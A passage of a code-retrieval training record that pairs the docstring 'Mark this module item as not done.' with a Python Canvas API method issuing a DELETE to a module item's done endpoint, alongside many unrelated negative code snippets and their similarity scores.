self.jobSender.send(self.jobSender.createJobDoneEvent(self.name,\n success,\n originatorId))", "def archive_done(self):\n if self.item_goal_nitems != 0:\n self.archive_output_done()\n\n if self.item_cur_nitems != self.item_goal_nitems:\n logger.error(\"\\nExpected %s files, archived %s files \"\n \"instead.\" % (self.item_goal_nitems,\n self.item_cur_nitems))\n if self.item_cur_nbytes != self.item_goal_nbytes:\n logger.error(\"\\nExpected %s bytes, archived %s bytes \"\n \"instead.\" % (self.item_goal_nbytes,\n self.item_cur_nbytes))\n\n assert self.item_cur_nitems == self.item_goal_nitems\n assert self.item_cur_nbytes == self.item_goal_nbytes", "def is_done():\n return False", "def complete(self):\n pass", "def test_mark_completed(self):\n event = Event.objects.all()[0]\n\n todo = TodoItem.objects.create(\n event=event, completed=False, title=\"Test TODO1\",\n due=datetime.date.today(), additional=\"\",\n )\n\n assert todo.completed is False\n\n self.client.get(reverse('todo_mark_completed', args=[todo.pk]))\n todo.refresh_from_db()\n\n assert todo.completed is True", "def mark_complete(todo_list):\r\n item = select_item(todo_list, \"Please enter the item number you wish to \"\r\n \"Mark Completed and hide from the \"\r\n \"list\\nEnter a negative number or zero to \"\r\n \"cancel\")\r\n if item >= 0:\r\n todo_list[item].visible = False\r\n return", "def teleportInDone(self):\n self.notify.debug(\"teleportInDone\")\n self.toonSubmerged = -1\n if self.nextState is not 'petTutorial':\n self.notify.info(\"add estate-check-toon-underwater to TaskMgr in teleportInDone()\")\n if hasattr(self, 'fsm'):\n taskMgr.add(self.__checkToonUnderwater, 'estate-check-toon-underwater')\n Place.Place.teleportInDone(self)", "def quit_game(self):\n self.done = True", "def jobComplete(self):\n self._Finished = True\n return", "def _success_finish(self):\n # run this task after scrapy process successfully finished\n # cache result, if there is at least one scraped item\n time.sleep(2) # let the data to be dumped into the output file?\n self._update_items_scraped()\n if self.items_scraped:\n self.save_cached_result()\n else:\n logger.warning('Not caching result for task %s (%s) '\n 'due to no scraped items.',\n self.task_data.get('task_id'),\n self.task_data.get('server_name'))\n logger.info('Success finish task #%s', self.task_data.get('task_id', 0))\n self.finished_ok = True", "def finished(self):\n self.update(self._total)" ]
[ "0.76290876", "0.7104358", "0.70515716", "0.70057595", "0.675455", "0.6700418", "0.6647", "0.65426934", "0.6470507", "0.64645696", "0.6429567", "0.64175504", "0.64175504", "0.64175504", "0.63983035", "0.6375131", "0.63530964", "0.630775", "0.62934726", "0.62571234", "0.62337446", "0.61975783", "0.61787903", "0.61662936", "0.61507696", "0.61033994", "0.61033994", "0.6088102", "0.6080167", "0.60641193", "0.6062565", "0.6050173", "0.6039471", "0.6035842", "0.6025023", "0.6009566", "0.60047114", "0.5981805", "0.59796906", "0.59615296", "0.5959899", "0.5949301", "0.59376866", "0.5923691", "0.5902073", "0.59005654", "0.5889307", "0.58838165", "0.5883066", "0.58679533", "0.5862333", "0.5831466", "0.582211", "0.57929367", "0.57800114", "0.5779882", "0.5775806", "0.5759354", "0.5758909", "0.5734711", "0.5734711", "0.57314634", "0.57295513", "0.5723601", "0.5723601", "0.5718335", "0.57164896", "0.570453", "0.5692362", "0.56880987", "0.56809103", "0.5679973", "0.5653304", "0.56403047", "0.5640245", "0.563928", "0.5616157", "0.56076956", "0.5602035", "0.55845886", "0.5576446", "0.5568738", "0.55674976", "0.5559148", "0.5533589", "0.55015254", "0.54924643", "0.549244", "0.5488148", "0.54858613", "0.54854715", "0.5475549", "0.5469822", "0.5466619", "0.54652685", "0.5463286", "0.54627234", "0.54608995", "0.54315686", "0.54255164" ]
0.6340129
17
Delete this module item.
def delete(self, **kwargs): response = self._requester.request( "DELETE", "courses/{}/modules/{}/items/{}".format( self.course_id, self.module_id, self.id ), _kwargs=combine_kwargs(**kwargs), ) module_item_json = response.json() module_item_json.update({"course_id": self.course_id}) return ModuleItem(self._requester, module_item_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __do_module_delete(item):\n\n file_path = DTF_MODULES_DIR + item.install_name\n\n if utils.delete_file(file_path) != 0:\n log.e(TAG, \"Error removing module file! Continuing.\")\n\n conn = sqlite3.connect(DTF_DB)\n cur = conn.cursor()\n\n # Remove the line first.\n sql = ('DELETE FROM modules '\n \"WHERE name='%s'\" % item.name)\n\n cur.execute(sql)\n conn.commit()\n\n return 0", "def delete(self):\r\n self.domain.delete_item(self)", "def delete(self):\n response = settings.database.delete_item(Key={'id': str(self.id)})\n raise_for_response(response)", "def delete_item(self):\n\n\t\tdb.session.delete(self)\n\t\tdb.session.commit()", "def delete(self):\n return self.items.delete(item_id=self.id)", "def delete(self, item):\n self._createAction(item, \"delete\")", "def delete(self):\n\n raise NotImplementedError('Must be implemented by subclasses')", "def delete(self):\n pass", "def delete(self):\n pass", "def delete(self):\n pass", "def delete(self):\n pass", "def delete(self):\n\n raise NotImplementedError()", "def _delete(self, item):\n self.cv.delete(item)", "def delete(self):\n self.manager.delete(self.name)", "def delete(self):\n self.manager.delete(self.name)", "def delete(self, item):\n # eg. node=item to attrs, telling item type to Graphviz._setattr\n self.graph._del(self.parent.handle, **{self.type: item})", "def delete(self):\n self.package = None", "def delete_item(self) -> None:\n item = self.get_selected_item(self.tree_cache)\n if item is None:\n return\n\n item.data().set_enabled(False)\n self.sync_tree_cache()", "def uncomplete(self, **kwargs):\n response = self._requester.request(\n \"DELETE\",\n \"courses/{}/modules/{}/items/{}/done\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def delete(self, itemId):\n\n table = self.__getTable()\n table.delete_item(itemId = itemId)", "def delete(self, *args, **kwargs):\n pass", "def delete(self, *args, **kwargs):\n pass", "def __delitem__(self,item):\n if item == self.lastKey: return\n installer = self.data[item]\n apath = self.dir.join(item)\n if isinstance(installer,InstallerProject):\n apath.rmtree(safety='Installers')\n else:\n apath.remove()\n del self.data[item]", "def delete(self):\n raise NotImplementedError", "def delete(self):\n ...", "def delete(self):\n return self.parent.delete_instance(self.name)", "def delete(self):\n os.system(\"rm \"+self._name)", "def remove(self):\n self._switch.odlclient._request(self._path, method=\"delete\")", "def delete(self):\n raise NotImplementedError()", "def delete(self):\n raise NotImplementedError()", "def __delitem__(self, key):\r\n self.client.delete(id=key, ignore=[404], **self.kwargs)", "def delete(self):\n self._client.delete(self)", "def delete_item(id: str):\n db.delete(id, kind=endpoint_model)\n return {\"result\": \"ok\"}", "def delete(self):\n self.manager.delete(self)", "def delete(self):\n return self.manager.delete(self)", "def __delitem__(self, key, *args, **kwargs):\n self._del(key, *args, **kwargs)", "def delete_item(self, location, user_id=None, **kwargs):\r\n course_id = location.course_key\r\n store = self._get_modulestore_for_courseid(course_id)\r\n return store.delete_item(location, user_id=user_id, **kwargs)", "def __delitem__(self, index: int) -> None:\n error = self._coreIndex.removeDescriptor(index)\n assertError(error)", "def delete(self):\n self.dbm().model_delete(self)", "def delete(self):\n items = ShopcartItem.find_by_shopcartid(self.id)\n\n for item in items:\n item.delete()\n\n db.session.delete(self)\n db.session.commit()", "def test_delete_item_using_delete(self):\n pass", "def delete(self, name):\n global items\n items = _Helper.all_item_except_searching_for(name)\n return {\"message\": f\"Item {name} deleted successfully\"}, 204", "def delete(self):\n del self.shx.atoms[self.index]", "def del_item(self, item):\n index = self.board[item.pos[0]][item.pos[1]].index(item)\n del self.board[item.pos[0]][item.pos[1]][index]", "def remove_item(self, idx_of_item):\n del self.items[idx_of_item]", "def delete_item(self):\n self.df_user.drop(self.index_select_number, inplace=True)\n self.df_user.to_csv(\"user_items.csv\", index=False)\n self.update_treeview()\n self.changing_item_label.config(text=\"Please double click on the item you want to edit.\")\n self.delete_but.destroy()\n self.serv_drop.destroy()\n self.serv_but.destroy()\n self.pop_up_del.destroy()", "def delete_item(self, id: str, user: User) -> bool:", "def __delitem__(self, index: Any) -> None:\n del self.contents[index]\n return", "def delete(self, type, id):\n path = self._get_path('delete').format(itemType=type, itemId=id)\n \n return self._DELETE(path)", "def delete(self):\n if self.iid is not None:\n self.db().remove(self.iid)", "def delete(self, box):\n boom = box.GetSelection()\n if boom == box.GetRootItem():\n return\n\n item_data = box.GetItemData(boom).GetData()\n\n if isinstance(item_data, data_types.ProductData):\n boom = box.GetItemParent(boom)\n item_data = box.GetItemData(boom).GetData()\n\n db = database.TransactionsDB()\n\n if box is self.list_sales:\n func = db.delete_sale\n sale.update_inventory(item_data, undo=True)\n elif box is self.list_expenses:\n func = db.delete_expense\n else:\n func = db.delete_waste\n waste.update_inventory(item_data, undo=True)\n\n func(item_data.ID)\n\n db.close()\n self.setup(None)", "def __delitem__(self, key):\n self.delete(key)", "def __delitem__(self, key):\n self.delete(key)", "def delete(self):\n return api.delete([self._key])", "def delete_item(self, item_id):\n # open a cursor\n cur = self.get_cursor()\n\n delete_item_statement = \"DELETE FROM transaction_items \" + \\\n \"WHERE transaction_item_id={0}\".format(item_id)\n\n cur.execute(delete_item_statement)\n\n # close the cursor\n self.close_cursor()", "def __delitem__(self, key):\n self.f_remove(key)", "def __delitem__(self, key):\n del self._get_storage()[key]", "def delete(self):\n # gid must be specified for deletion\n gid = self.get_query_argument('gid')\n self.write(self._rpc.aria2.remove(self._token, gid))", "def delete(self, *args, **kwargs):\n return 0", "def __delitem__(self, userid):\r\n self.removePlayer(userid)", "def delete(self):\n\n if not self.context.model.is_editable():\n raise Unauthorized(\"Editing is not allowed\")\n\n # the agenda_item is ad hoc if it has a document but no proposal\n if self.agenda_item.has_document and not self.agenda_item.has_proposal:\n document = self.agenda_item.resolve_document()\n trasher = ITrashable(document)\n trasher.trash()\n\n self.agenda_item.remove()\n\n return JSONResponse(self.request).info(\n _(u'agenda_item_deleted',\n default=u'Agenda Item Successfully deleted')).dump()", "def delete(self, *args, **kwargs) -> Any:\n pass", "def delete(self):\n # type: () -> BoundAction\n return self._client.delete(self)", "def __delitem__(self, package):\n\n\t\tdel self._packages[package]", "def delete(self, *args, **kwargs):\n raise NotImplementedError()", "def delete(self, *args, **kwargs):\n return self.handle_delete_request()", "def deleteRig(self):\n\n allNodes = cmds.ls(\"*\")\n for node in allNodes:\n if cmds.objExists(node + \".sourceModule\"):\n cmds.lockNode(node, lock=False)\n source = cmds.getAttr(node + \".sourceModule\")\n if source == self.name:\n try:\n cmds.delete(node)\n except:\n pass", "def delModule(name):", "def on_delete(action, item, view):\n actors.remove(action.actor)\n self.remove(item)", "def delete(self, _id):", "def on_deleteButton_clicked(self):\n itm = self.protocolHandlersList.selectedItems()[0]\n self.__manager.removeProtocolHandler(itm.text(0))\n \n self.protocolHandlersList.takeTopLevelItem(\n self.protocolHandlersList.indexOfTopLevelItem(itm))\n del itm", "def delete(self):\n raise exceptions.NotImplemented", "def remove(self, item: Item) -> None:\n raise NotImplementedError(\"remove\")", "def delete(self):\n DATABASE_CONNECTION.delete(self.__class__.__name__, self.id)", "def delete(self):\n self.current_revision.delete()", "def delete(self, name):\n\n pass", "def DeletePlaylist(self):\n os.remove(self.path)", "def delete_field(self):\n self.exec_command(b\"DeleteField\")", "def delete(self):\n\n # TODO find a way to remove this when sub-classing in HCRoot\n self.parent.del_child(self)", "def delete_item_by_id(self, id):\n response = self.table_connector.delete_item(Key={self.primary_key: id})\n print(response)", "def delete(self):\n self.request().delete()", "def delete(self, name=None):\n raise NotImplementedError", "def delete_item(id):\n return '', 201", "def delete(self, index):\n del self.data[index]", "def __delitem__(self, key):\n del self.list[key]", "def delete(self, application_id):", "def delete():", "def delRepoItem(self, key):\n\n ACCESS_TOKEN = initZenodo(self.hostDefn['localhost']['localSettings']/'zenodoSettings.dat')\n r = requests.delete('https://zenodo.org/api/deposit/depositions/%s' % self.nbDetails[key]['repoInfo']['id'],\n params={'access_token': ACCESS_TOKEN})\n if r.ok:\n print(f\"Item {self.nbDetails[key]['title']} deleted from repo.\")\n self.nbDetails[key]['repoInfo'] = None\n self.nbDetails[key]['doi'] = None\n else:\n print(f\"Failed to remove item {self.nbDetails[key]['title']}, code: {r.status_code}\")", "def delete(self):\n url = util.join_url(self.path, str(self['id']))\n new_attributes = self.api.delete(url)\n self.error = None\n self.merge(new_attributes)\n return self.success()", "def __do_library_delete(item):\n\n file_path = DTF_LIBRARIES_DIR + item.install_name\n\n if utils.delete_tree(file_path) != 0:\n log.e(TAG, \"Error removing tree! Continuing.\")\n\n conn = sqlite3.connect(DTF_DB)\n cur = conn.cursor()\n\n # Remove the line first.\n sql = ('DELETE FROM libraries '\n \"WHERE name='%s'\" % item.name)\n\n cur.execute(sql)\n conn.commit()\n\n return 0", "def delete(self):\n self._instance.delete()\n self._instance = None\n self._data_defs = []", "def delete(self, item_id, **params):\n\n self.queue('delete', item_id=item_id, **params)", "def cfDel(self, key, item):\n params = [key, item]\n\n return self.execute_command(self.CF_DEL, *params)", "def hdel(self):\n return self.delete()", "def delete_version(self):\n pass", "def __delitem__(self, key):\n pass", "def __delitem__(self, key):\n pass", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()", "def remove(self):\n self._delete()" ]
[ "0.76490295", "0.76386184", "0.7293862", "0.7082898", "0.7029256", "0.7006791", "0.6655195", "0.66186965", "0.66186965", "0.66186965", "0.66186965", "0.6595931", "0.657923", "0.65764403", "0.65764403", "0.65596324", "0.65374285", "0.6532332", "0.65124965", "0.6511554", "0.6504799", "0.6504799", "0.64847076", "0.6469156", "0.6462438", "0.6453846", "0.6430069", "0.6428038", "0.63959616", "0.63959616", "0.6378007", "0.6365043", "0.63383144", "0.63283324", "0.62865865", "0.62723184", "0.62576586", "0.6256502", "0.6251777", "0.6245268", "0.6230858", "0.62262803", "0.62026924", "0.61892784", "0.6186102", "0.61792314", "0.61787647", "0.61740875", "0.6171415", "0.61712307", "0.6166127", "0.6144048", "0.6144048", "0.6141173", "0.6135955", "0.61335105", "0.61307114", "0.61205125", "0.61193794", "0.61189646", "0.6108568", "0.6107296", "0.6106686", "0.6101655", "0.6100314", "0.6098781", "0.60875124", "0.60603374", "0.6050973", "0.60391366", "0.6038312", "0.60355693", "0.6032106", "0.6028666", "0.6009965", "0.6004492", "0.60027975", "0.5995303", "0.59905094", "0.5990163", "0.59847105", "0.5977103", "0.5977094", "0.59747785", "0.5965476", "0.5963645", "0.59544545", "0.5954433", "0.5951811", "0.5951384", "0.5943433", "0.59374756", "0.5930736", "0.5930622", "0.59283066", "0.59251523", "0.59251523", "0.5923607", "0.5923607", "0.5923607" ]
0.7723441
0
Update this module item.
def edit(self, **kwargs): response = self._requester.request( "PUT", "courses/{}/modules/{}/items/{}".format( self.course_id, self.module_id, self.id ), _kwargs=combine_kwargs(**kwargs), ) module_item_json = response.json() module_item_json.update({"course_id": self.course_id}) return ModuleItem(self._requester, module_item_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def updateItem(self, object):\n pass", "def __update_module(item):\n\n conn = sqlite3.connect(DTF_DB)\n cur = conn.cursor()\n\n # Remove the line first.\n sql = ('DELETE FROM modules '\n \"WHERE name='%s'\" % item.name)\n\n cur.execute(sql)\n\n entry = [(item.name, item.about, item.version,\n item.author, item.install_name)]\n\n # Update a Module Entry\n sql = ('INSERT INTO modules (name, about, version, '\n 'author, install_name)'\n 'VALUES (?, ?, ?, ?, ?)')\n\n cur.executemany(sql, entry)\n conn.commit()\n\n return cur.rowcount", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs):\n pass", "def update(self):\n\n pass", "def update(self) -> None:\n pass", "def update(self) -> None:\n pass", "def update(self, **kwargs):\n self.manager.update(self, **kwargs)", "def update(self, **kwargs):\n self.manager.update(self, **kwargs)", "def update(self):\n raise NotImplementedError", "def update(self):\n\n raise NotImplementedError('Must be implemented by subclasses')", "def update(self):\n raise NotImplementedError()", "def update(self, *args, **kw):\n pass", "def update_item(self, table, item):", "def update(self) -> None:\n ...", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update_item(self, xblock, user_id, allow_not_found=False):\r\n course_id = xblock.scope_ids.usage_id.course_key\r\n store = self._get_modulestore_for_courseid(course_id)\r\n return store.update_item(xblock, user_id)", "def update(self):\n return self._process('update')", "def update(self, **kwargs):\n return self.manager.update(self, **kwargs)", "def update(self, **kwargs):\n return self.manager.update(self, **kwargs)", "def update(self, **kwargs):\n return self.manager.update(self, **kwargs)", "def update_item(self, id: str, user: User, **kwargs) -> None:", "def update(self, *args, **kwargs):\n raise NotImplementedError", "def update(self):\n ckresult(_dll.FMOD_System_Update(self._ptr))", "def update(cls) -> None:\n raise NotImplementedError", "def _update(self):\n pass", "def update(self):\r\n pass", "def update(self):\n self.attributes = self.call('UPDATE', expect=error.OK, body=self.attributes)", "def _update_item(self, item, user):\n item.user_modified = user\n try:\n item.panel = item.panel\n item.item_priority = item.priority\n except AttributeError:\n pass\n item.is_packed = True\n item.save()\n return item", "def update(self, **kwargs):\n return self.parent.update_instance(self.name, kwargs)", "def update_item(self, item):\n try:\n index = self.ui.listItemList.model().index_of(item)\n # TODO: missing a way to insert row, don't know how to add data with insertRows\n # see https://svn.enthought.com/svn/enthought/TraitsBackendQt/trunk/enthought/traits/ui/qt4/list_str_model.py\n #if item.isRead() and self.show_updated_only():\n # self.ui.listItemList.model().removeRow(index.row())\n #else:\n self.ui.listItemList.update(index)\n except:\n pass\n self.update_title()", "def complete(self, **kwargs):\n response = self._requester.request(\n \"PUT\",\n \"courses/{}/modules/{}/items/{}/done\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def update( ):\r\n pass", "def update(self)->None:\n pass", "def update(self):\n #self._switch.odlclient._request_json(self._path, method=\"put\", json={\n # \"flow\": self._odl_inventory()\n #})\n self.remove() # actually, remove only uses self.switch and self.id, so this removes the other entry as well.\n self.deploy()", "def update(self):\n # convert the text list of item identifiers into a list of parsed identifiers\n item_identifiers = filter(None, self.packing_list.list_items.replace('\\r', '').split('\\n'))\n # loop through list of parsed identifiers\n for item_identifier in item_identifiers:\n # 1. get the 'item' instance for this identifier and update it (e.g. SubjectRequisition, Aliquot)\n # 2. create a 'packing_list_item' instance related to this packing_list\n for item_model in self.packing_list.item_models:\n try:\n try:\n item = item_model.objects.get(specimen_identifier=item_identifier)\n optional_attrs = {'panel': item.panel, 'item_priority': item.priority}\n except FieldError:\n item = item_model.objects.get(aliquot_identifier=item_identifier)\n optional_attrs = {}\n user = self.user or item.user_modified\n self._update_item(item, user)\n self._create_or_update_packinglistitem(\n item_identifier,\n item,\n user,\n optional_attrs=optional_attrs)\n except item_model.DoesNotExist:\n pass", "def update(self, *args, **kwargs):", "def updateModel(self):\n pass", "def update(self, data):\n pass", "def update(self, data):\n pass", "def update(self, data):\n pass", "def update(self, data):\n pass", "def update(self, **options):\n pass", "def update():", "def update():", "def update(self):\n if not self._updating:\n self._update()\n else:\n _logme.log('Already updating, aborting.', 'debug')", "def updateItem(self, item, values):\n print ('Updating item: ' + unicode(item))\n item = int(item) #Importante: Para evitar que se caiga la api de PODIO más adelante\n message = self._client.Item.update(item, {'fields':values})\n return message", "def update(self):\n # TO DO for updating urls if changed\n pass", "def update(self, mapItem: MapItem):\n pass", "def update(self):\n self._client.patch(self)", "def update(self):\n self.__execute(self.pkgin_bin, \"update\")", "async def updated(self, value):\n pass", "def update(self, dt):\n super(Agent, self).update(dt)\n\n if self._module is not None:\n self._module.update(dt)", "def update(self):\n # default implementation is to do nothing.", "def update(self, *args, **kwargs) -> None:\n self.update_state(args[0])\n super().update(*args, **kwargs)", "def update_data(self):\n self._model.update()\n self.__refresh()", "def update_model(self):\n pass", "def Update(self):\r\n\r\n # does nothing\r\n pass", "def update(self) -> None:\n pass", "def Update(self, controller):\n pass", "def update(self, *args: Any, **kwargs: Any) -> None:\n self._check_for_increment(\"update\")\n self[-1].update(*args, **kwargs)", "def update_model(self):\n pass # TODO: Implement this.", "def update(self, args):\n pass", "def item_shared(self, item):\n self.update_item(item)", "def update_data():\n pass", "def item_read(self, item):\n self.update_item(item)", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, request: HttpRequest) -> None:\n from .modifiers import basket_modifiers_pool\n\n self.extra_rows = OrderedDict()\n self.unit_price = Decimal(self.product.get_price(request))\n self.subtotal = self.unit_price * self.quantity\n self.total = self.subtotal\n for modifier in basket_modifiers_pool.get_modifiers():\n modifier.process_item(self, request)", "def update(self, *args, **kwargs):\n # callable, but does nothing by default", "def __itemChanged(self, event):\n if event in (items.ItemChangedType.DATA, items.ItemChangedType.MASK):\n self._updateFromItem()", "def update(self):\n self.m.update()", "def commandUpdate(self):\n pass", "def update(self, item):\n if isinstance(item, Component) and item.has_focus():\n idblock, sib = item.get_data()\n atuple = int(sib['info1'].decode()), sib\n self.parent.update_window(\n \"application.editionblock.seteditors\", atuple)\n else:\n self.parent.update_window(\n \"application.editionblock.cleareditors\", None)", "def update(self, parent):\r\n pass", "def update(self, request: HttpRequest) -> None:\n from .modifiers import basket_modifiers_pool\n\n items = self.get_items()\n self.extra_rows = OrderedDict()\n self.subtotal = 0\n for item in items:\n item.update(request)\n self.subtotal += item.total\n self.total = self.subtotal\n for modifier in basket_modifiers_pool.get_modifiers():\n modifier.process_basket(self, request)\n self._cached_items = items", "def submodule_update(self, *args: Any, **kwargs: Any) -> Iterator[Submodule]:\n return RootModule(self).update(*args, **kwargs)", "def Update(self, action, context):\n # type: (QtWidgets.QAction, MenuContext) -> None\n pass", "def update(self):\n for component in self.components.values():\n try:\n component.update()\n except Exception as e:\n if self.ds.isFMSAttached():\n log.error(\"In subsystem %s: %s\" % (component, e))\n else:\n raise e", "def update(self, params):", "async def update(self) -> None:\n data = await self._state.http.get_user_inventory(self.owner.id64, self.game.app_id, self.game.context_id)\n self._update(data)" ]
[ "0.7510124", "0.6885239", "0.6734443", "0.6734443", "0.6734443", "0.6712268", "0.6665374", "0.6665374", "0.6655217", "0.6655217", "0.66270894", "0.66064", "0.660304", "0.65442324", "0.6532563", "0.65279996", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.6476467", "0.6458027", "0.6429411", "0.6429411", "0.6429411", "0.64222753", "0.6417129", "0.64086044", "0.6407966", "0.6355097", "0.633963", "0.6329778", "0.63035583", "0.6300588", "0.62765", "0.6256494", "0.624201", "0.6226217", "0.6180971", "0.617355", "0.61629325", "0.61480266", "0.6141742", "0.6141742", "0.6141742", "0.6141742", "0.6135648", "0.61195815", "0.61195815", "0.6109271", "0.6086106", "0.607024", "0.6065335", "0.60629684", "0.60600376", "0.60592985", "0.604853", "0.6045855", "0.6034528", "0.5998652", "0.5975558", "0.59690094", "0.5935201", "0.5932474", "0.59290147", "0.5911936", "0.5909394", "0.5880365", "0.5878961", "0.5862438", "0.58617145", "0.58617145", "0.58617145", "0.58617145", "0.58617145", "0.58617145", "0.58474815", "0.5842349", "0.58421427", "0.5837195", "0.5826314", "0.582329", "0.5814268", "0.5799839", "0.57930315", "0.5786483", "0.57730025", "0.57572174", "0.5756274" ]
0.67989796
2
Mark this module item as not done.
def uncomplete(self, **kwargs): response = self._requester.request( "DELETE", "courses/{}/modules/{}/items/{}/done".format( self.course_id, self.module_id, self.id ), _kwargs=combine_kwargs(**kwargs), ) module_item_json = response.json() module_item_json.update({"course_id": self.course_id}) return ModuleItem(self._requester, module_item_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mark_as_not_done(self):\n grade_event = {'value': 0, 'max_value': self.points}\n self.runtime.publish(self, 'grade', grade_event)", "def test_done_default_value_is_False(self):\n item = Item(name = \"A test item\")\n self.assertEqual(item.name, \"A test item\")\n self.assertFalse(item.done)", "def disable(self, item_id):\n pass", "def set_task_not_started(self):\n\n tasks = self._get_all_tasks()\n\n task_id = tasks[self.tasks_view.currentRow()].Id\n\n self.tasks_flow.set_status(task_id, 2)\n\n # Refresh the table\n self.write_tasks_table()", "def mark_as_done(self):\n\n done = self.in_progress_scroll_cell.get()\n if done is None:\n self.master.show_error_popup('No Item', 'There is no item in the list to mark as done')\n return\n self.in_progress_scroll_cell.remove_selected_item()\n self.done_scroll_cell.add_item(done)", "def markUnplayed(self, item):\n key = f'{self.METADATA}/actions/unscrobble'\n ratingKey = item.guid.rsplit('/', 1)[-1]\n params = {'key': ratingKey, 'identifier': 'com.plexapp.plugins.library'}\n self.query(key, params=params)\n return self", "def uncomplete(self):\n ### TODO: needs test code for code coverage!\n ## (it has been tested through the calendar-cli test code)\n if not hasattr(self.vobject_instance.vtodo, \"status\"):\n self.vobject_instance.vtodo.add(\"status\")\n self.vobject_instance.vtodo.status.value = \"NEEDS-ACTION\"\n if hasattr(self.vobject_instance.vtodo, \"completed\"):\n self.vobject_instance.vtodo.remove(self.vobject_instance.vtodo.completed)\n self.save()", "def async_mark_unavailable(self):\n self._available = False", "def deny(self):\n self.quest_node['completed_by'] = ''\n self.completed_by = None\n self.active = True\n self.quest_node['active'] = True\n graph.push(self.quest_node)", "def _clicked_no_button(self):\n self.yes = False", "def mark_no_changes(self):", "def _not(self, _not):\n\n self.__not = _not", "def _not(self, _not):\n\n self.__not = _not", "def _not(self, _not):\n\n self.__not = _not", "def _not(self, _not):\n\n self.__not = _not", "def _not(self, _not):\n\n self.__not = _not", "def set_as_not_feedback(self):\n self.feedback = False", "def mark_as_in_progress(self):\n\n in_prog = self.todo_scroll_cell.get()\n if in_prog is None:\n self.master.show_error_popup('No Item', 'There is no item in the list to mark as in progress')\n return\n self.todo_scroll_cell.remove_selected_item()\n self.in_progress_scroll_cell.add_item(in_prog)", "def pending(self):\n self.state = Step.State.PENDING", "def tick_skipped(self):\n pass", "def mark_as_undone(self):\n if self.can_mark_as_undone():\n return self.__set_completion_status(False)\n return False", "def begin_not_undoable_action(self):\n self.not_undoable_action = True", "def can_mark_as_undone(self):\n if (not self.archived) and self.event_store.done:\n return True\n return False", "def end_not_undoable_action(self):\n self.not_undoable_action = False", "def set_Off(self):\n if not(self._locked):\n self.__dict__['statusOn']=False\n self._undo_action()\n else:\n self._log.info('The JobProperty %s is blocked', self.__name__)", "def disable_if_done(self):\n for cost in self:\n cost.disable_if_done()", "def notEnabledDummy(self, ev):\n pass", "def just_died(self):\r\n self.dead = True", "def unmark_for_destruction(self):\n self.marked_for_destruction = False", "def uncheck(self,item):\r\n raise AbstractError\r\n return False", "def set_unavailable(self):\n self[\"available\"] = False", "def set_task_finished(self):\n self.busy = False", "def set_ignore_flag(self, reag_item_id: int, do_ignore: bool) -> dict:\n raise NotImplementedError('not implemented')", "def mark_complete(todo_list):\r\n item = select_item(todo_list, \"Please enter the item number you wish to \"\r\n \"Mark Completed and hide from the \"\r\n \"list\\nEnter a negative number or zero to \"\r\n \"cancel\")\r\n if item >= 0:\r\n todo_list[item].visible = False\r\n return", "def test_done_value_can_be_set_to_True(self):\n item = Item(name = \"A test item\", done = True)\n self.assertEqual(item.name, \"A test item\")\n self.assertTrue(item.done)", "def mark_as_done(self):\n self.status = \"DONE\"", "def should_skip(self, test_item):\n msg = messages.ShouldSkip(test_id=test_item.identifier)\n reply_msg = self._request(msg)\n return reply_msg.should_skip is not None", "def mark_as_done(self, task):\n raise NotImplementedError('')", "def setNoCheckout(self) -> None:\n ...", "def disable_if_done(self, commit=True):\n if self._is_billing_complete() and not self.disabled:\n self.disabled = True\n\n if commit:\n self.save()", "def not_use_triggered(self):\n\n self.select_items()\n if self.items_selected:\n for index, item in enumerate(self.items_selected):\n index_selected = self.indices_selected[index]\n frame_selected = index_selected + 1\n item.setText(\"Frame %i excluded\" % frame_selected)\n item.setBackground(self.background_excluded)\n item.setForeground(QtGui.QColor(255, 255, 255))\n self.index_included[index_selected] = False\n self.frame_selector.setPhoto(self.frame_index)", "def unlock(self, item_type):", "def check_deletable(self):\n item = self.albums_artists.currentItem()\n self.delete_button.setEnabled(False)\n if item in self.new_artists:\n self.delete_button.setEnabled(True)", "def mark_for_destruction(self):\n self.marked_for_destruction = True", "def set_goal_done(self):\n self.has_goal = False\n self.last_goal_wait = False", "async def _skip(self, ctx: commands.Context):\n\n if not ctx.voice_state.is_playing:\n return await ctx.send('Not playing any music right now...')\n\n voter = ctx.message.author\n if voter == ctx.voice_state.current.requester:\n await ctx.message.add_reaction('⏭')\n ctx.voice_state.skip()\n\n elif voter.id not in ctx.voice_state.skip_votes:\n ctx.voice_state.skip_votes.add(voter.id)\n total_votes = len(ctx.voice_state.skip_votes)\n\n if total_votes >= 1:\n await ctx.message.add_reaction('⏭')\n ctx.voice_state.skip()\n else:\n await ctx.send('Skip vote added, currently at **{}/3**'.format(total_votes))\n\n else:\n await ctx.send('You have already voted to skip this song.')", "async def team_unignore(self, ctx: commands.Context):\n await self.config.user(ctx.author).do_not_message.set(False)\n await ctx.send('Okay, I\\'ll include you back in team-wide DMs.')", "def must_skip(self, item):\r\n user = c.user 